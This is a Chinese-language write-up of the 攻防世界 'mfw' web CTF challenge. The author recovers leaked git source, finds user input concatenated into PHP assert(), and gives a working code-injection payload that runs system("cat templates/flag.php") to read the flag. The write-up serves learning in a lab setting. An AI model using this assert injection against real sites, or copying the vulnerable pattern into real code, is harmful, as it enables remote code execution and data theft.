攻防世界-web-mfw
关胜
开始没有什么思路,参考网上别人的wp,首先提到的一个点就是源码泄漏
摘自https://lddp.github.io/2018/05/10/WEB-%E6%BA%90%E7%A0%81%E6%B3%84%E6%BC%8F/
关于源码泄漏,这位师傅已经总结了。
然后是git源码泄漏,用GitHack-master下载下来之后,可以看到源码。
先来看index.php
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
assert可以执行任意代码。然后用括号给它闭合上,也就是$page=')xxx;//
xxx就是要执行的代码,前面一个单引号和括号把之前的函数闭合,然后分号后面的两个斜杠注释掉后面的php代码。
我们下载下来的源码能够看到网站代码结构,index.php同级目录下有一个templates的文件夹,其中有flag.php(打开之后看不到),然后就试一下用system(“cat templates/flag.php”)。
输入page=').system("cat templates/flag.php");//
右键查看源码,得到flag
问题:
为什么git恢复的flag.php看不到flag值,但是通过cat该目录下的flag就能看到,这是怎么实现的呢?
类似资料: